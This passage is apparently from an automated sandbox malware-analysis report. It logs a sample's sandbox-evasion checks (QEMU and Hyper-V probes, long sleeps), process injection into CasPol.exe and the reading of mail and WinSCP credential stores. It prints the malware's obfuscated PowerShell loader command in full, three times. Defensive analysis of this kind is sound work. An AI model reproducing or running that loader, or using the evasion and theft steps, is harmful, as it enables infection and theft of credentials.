            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: powershell.exe, 00000006.00000002.86777664245.0000000007280000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: powershell.exe, 00000006.00000002.86781234856.000000000734F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE,
            Source: Initial fileInitial file: do while timer-temp<sec
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 3308Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 3308Thread sleep time: -90000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 4272Thread sleep count: 685 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 4272Thread sleep time: -342500s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 3308Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9040Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWindow / User API: threadDelayed 685Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 30000Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 30000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: ModuleInformationJump to behavior
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 0000000C.00000002.91096675961.00000000014A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: CasPol.exe, 0000000C.00000002.91095102327.0000000001440000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
            Source: powershell.exe, 00000006.00000002.86781234856.000000000734F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe,
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: powershell.exe, 00000006.00000002.86777664245.0000000007280000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_20496418 LdrInitializeThunk,12_2_20496418
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$biliate = """laabrdgedga-sttdiycopsteun st-udthoyaupepewrdreetrfpaiusnumiretcoimaofrnsv sm'reusksunifuncogkn tosphyprsjatnuesimst;viusmsprisknangim prsplyeusgrtgueoemfo.rerpuuconhutsoifrmfreil.joifonsntsnelurcoopapjastrererelvkuiticreefesbr;ampupukobsnlvoidecaw sasrutrhajetaaitecsv brceslfoaunsvasle ebtinubaebaiourceokonpr1ci sh{ti[phdaflullbuimimhapmaoafreutan(ad`"""inuluskiekarme3br2si`"""rr)ri]gopmauflbstlmeitycsa aeskatinahjtsmisvcne stehoxattimeteropnna gribenbrtno yddmierestotenrbrostyovcspamermiecotkl(sn)me;sm[afdepllulreienmflprdoharegtbr(ov`"""migaldmeipl3in2er`"""te)ce]tapeuudrbculmaihjcas lgsudttrabrtsqiercco viebextetveetrrhrnma foibanartha stsbrcudagrllaeskwteiscnsudreobuwcrevexchtstesuxkn(noifinkutse modlnrigibefratpl,reiannaltju beaudmambmiupalheaap,diifonkntsp jubprasesvaoqu,mailenimtba noiafadagvrtpotsyaov,chigenpltre divsaetvjsimboasotan1un5fr8ud,giitinstter yemsucslgkursk)eg;ak[kuddilbulimirdmampanovarprtfr(sk`"""svksqerorpinflerelpa3ov2as`"""tr)wo]hepmeurobbalfrilucre hysmitfoaunttaitmcja anedexmitkuesarblnoi reifansutov drhdeestabapblsbeispzbaeko(stiunnditou ycpkerbrourpre,phisonxatcl aianodstrchefosov,viidenjutdi mutimowerartinrfripo)mo;co[sldoplsalspiapmunpreosjrrotko(wh`"""jgsschdiebilshlko3ge2re.vaduflomlun`"""st)un]beppauslboslbeiuncas masmntsyaletfritrcpr noevixratfoererwenun sevenofuitrdrh padterflafigmefciiennstikasbehmi(esibonsutpo opomumpldserge)ba;ej[spdfalbelmeilimhepfroudrgutau(je`"""mawskifantemnumin.apdkolbolfl`"""fu)ho]scpovuprbmdlviialcba bossatasahotliifocsi veenoxluthaebirjenla hoiennnatgu armtjihoxscedartrgswejotcodtrefivsuckeamipqussu(skiblncitch benpribrtserud,uditincotjo vafaseewlob,thivinquteo noaphfafsxi9im3bl)ta;ls[chdculcalhaipumcipicofarretsl(be`"""rekgletrrhinatesilek3sa2ur`"""ti)de]papfeudrbfolopilkctn busabtsyaudtmeisocfr coeimxfatmoefrrnanto trimentotal kaludoescaskqurosepasphoovuforjucapeph(roiafncotte velexesoiun)ir;un[redpiliwloyilammipshostrfatcr(bo`"""flkauecervantoejelav3pl2re`"""se)co]unpanucoboplfoilacla casrotopauntmuikacti wieknxentreeudrtrntr ariponintsl pivinistrpetrauacatilvaatelbelclothcfa(tristnsotwi gevgr1sk,smilunthtor cavbl2ne,keistncotby hevdr3pa,heiganuptku svvca4in)pr;py[drdmalinlpribrmhepploknrpttba(ho`"""craundbevalatopanicr3st2ph.wadbelsalci`"""to)un]stptiurebsylpuiencfo cosmotunaunthuiatcst meemixdotofeadrinnro suvbeoupividti cimtrabipbegateoensleglrpribrccomfiaunsankvn(saisknmetpe plbinrtriodnobkir,doidenqutru camchiuddtitknssn)in;ov[trdrelselfuiunmripgoosuromtsc(ve`"""brkvaemermanpeesklst3co2in`"""ef)ce]bepkoumybkollbicocun edsgatkuatetkoiaaclu noevexprtneeunranncy prisenlvtplpfotborkr scegansuumemfuschyfrspotbeeoomfjlguoflcsranelgaevosprwun(paudiieynsttpe grvex1ma,psihankoten kovgr2ha)et;om[oodrhldilflisumenpskoovrtrtsp(st`"""obkedeelrrentaedaldi3sc2di`"""si)ni]fopchutlbdalcaialcli smsnytvaaretprisuctr luebexgattregermanbr reigunentan unsgieunttiten
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$biliate = """laabrdgedga-sttdiycopsteun st-udthoyaupepewrdreetrfpaiusnumiretcoimaofrnsv sm'reusksunifuncogkn tosphyprsjatnuesimst;viusmsprisknangim prsplyeusgrtgueoemfo.rerpuuconhutsoifrmfreil.joifonsntsnelurcoopapjastrererelvkuiticreefesbr;ampupukobsnlvoidecaw sasrutrhajetaaitecsv brceslfoaunsvasle ebtinubaebaiourceokonpr1ci sh{ti[phdaflullbuimimhapmaoafreutan(ad`"""inuluskiekarme3br2si`"""rr)ri]gopmauflbstlmeitycsa aeskatinahjtsmisvcne stehoxattimeteropnna gribenbrtno yddmierestotenrbrostyovcspamermiecotkl(sn)me;sm[afdepllulreienmflprdoharegtbr(ov`"""migaldmeipl3in2er`"""te)ce]tapeuudrbculmaihjcas lgsudttrabrtsqiercco viebextetveetrrhrnma foibanartha stsbrcudagrllaeskwteiscnsudreobuwcrevexchtstesuxkn(noifinkutse modlnrigibefratpl,reiannaltju beaudmambmiupalheaap,diifonkntsp jubprasesvaoqu,mailenimtba noiafadagvrtpotsyaov,chigenpltre divsaetvjsimboasotan1un5fr8ud,giitinstter yemsucslgkursk)eg;ak[kuddilbulimirdmampanovarprtfr(sk`"""svksqerorpinflerelpa3ov2as`"""tr)wo]hepmeurobbalfrilucre hysmitfoaunttaitmcja anedexmitkuesarblnoi reifansutov drhdeestabapblsbeispzbaeko(stiunnditou ycpkerbrourpre,phisonxatcl aianodstrchefosov,viidenjutdi mutimowerartinrfripo)mo;co[sldoplsalspiapmunpreosjrrotko(wh`"""jgsschdiebilshlko3ge2re.vaduflomlun`"""st)un]beppauslboslbeiuncas masmntsyaletfritrcpr noevixratfoererwenun sevenofuitrdrh padterflafigmefciiennstikasbehmi(esibonsutpo opomumpldserge)ba;ej[spdfalbelmeilimhepfroudrgutau(je`"""mawskifantemnumin.apdkolbolfl`"""fu)ho]scpovuprbmdlviialcba bossatasahotliifocsi veenoxluthaebirjenla hoiennnatgu armtjihoxscedartrgswejotcodtrefivsuckeamipqussu(skiblncitch benpribrtserud,uditincotjo vafaseewlob,thivinquteo noaphfafsxi9im3bl)ta;ls[chdculcalhaipumcipicofarretsl(be`"""rekgletrrhinatesilek3sa2ur`"""ti)de]papfeudrbfolopilkctn busabtsyaudtmeisocfr coeimxfatmoefrrnanto trimentotal kaludoescaskqurosepasphoovuforjucapeph(roiafncotte velexesoiun)ir;un[redpiliwloyilammipshostrfatcr(bo`"""flkauecervantoejelav3pl2re`"""se)co]unpanucoboplfoilacla casrotopauntmuikacti wieknxentreeudrtrntr ariponintsl pivinistrpetrauacatilvaatelbelclothcfa(tristnsotwi gevgr1sk,smilunthtor cavbl2ne,keistncotby hevdr3pa,heiganuptku svvca4in)pr;py[drdmalinlpribrmhepploknrpttba(ho`"""craundbevalatopanicr3st2ph.wadbelsalci`"""to)un]stptiurebsylpuiencfo cosmotunaunthuiatcst meemixdotofeadrinnro suvbeoupividti cimtrabipbegateoensleglrpribrccomfiaunsankvn(saisknmetpe plbinrtriodnobkir,doidenqutru camchiuddtitknssn)in;ov[trdrelselfuiunmripgoosuromtsc(ve`"""brkvaemermanpeesklst3co2in`"""ef)ce]bepkoumybkollbicocun edsgatkuatetkoiaaclu noevexprtneeunranncy prisenlvtplpfotborkr scegansuumemfuschyfrspotbeeoomfjlguoflcsranelgaevosprwun(paudiieynsttpe grvex1ma,psihankoten kovgr2ha)et;om[oodrhldilflisumenpskoovrtrtsp(st`"""obkedeelrrentaedaldi3sc2di`"""si)ni]fopchutlbdalcaialcli smsnytvaaretprisuctr luebexgattregermanbr reigunentan unsgieunttitenJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\WindowsJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEnJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.cmdlineJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7743.tmp" "c:\Users\user\AppData\Local\Temp\0j5ctfzr\CSC3A80B568F8BB4D66897E5CE811419E16.TMP"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_079DD7E4 CreateNamedPipeW,6_2_079DD7E4

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5484, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
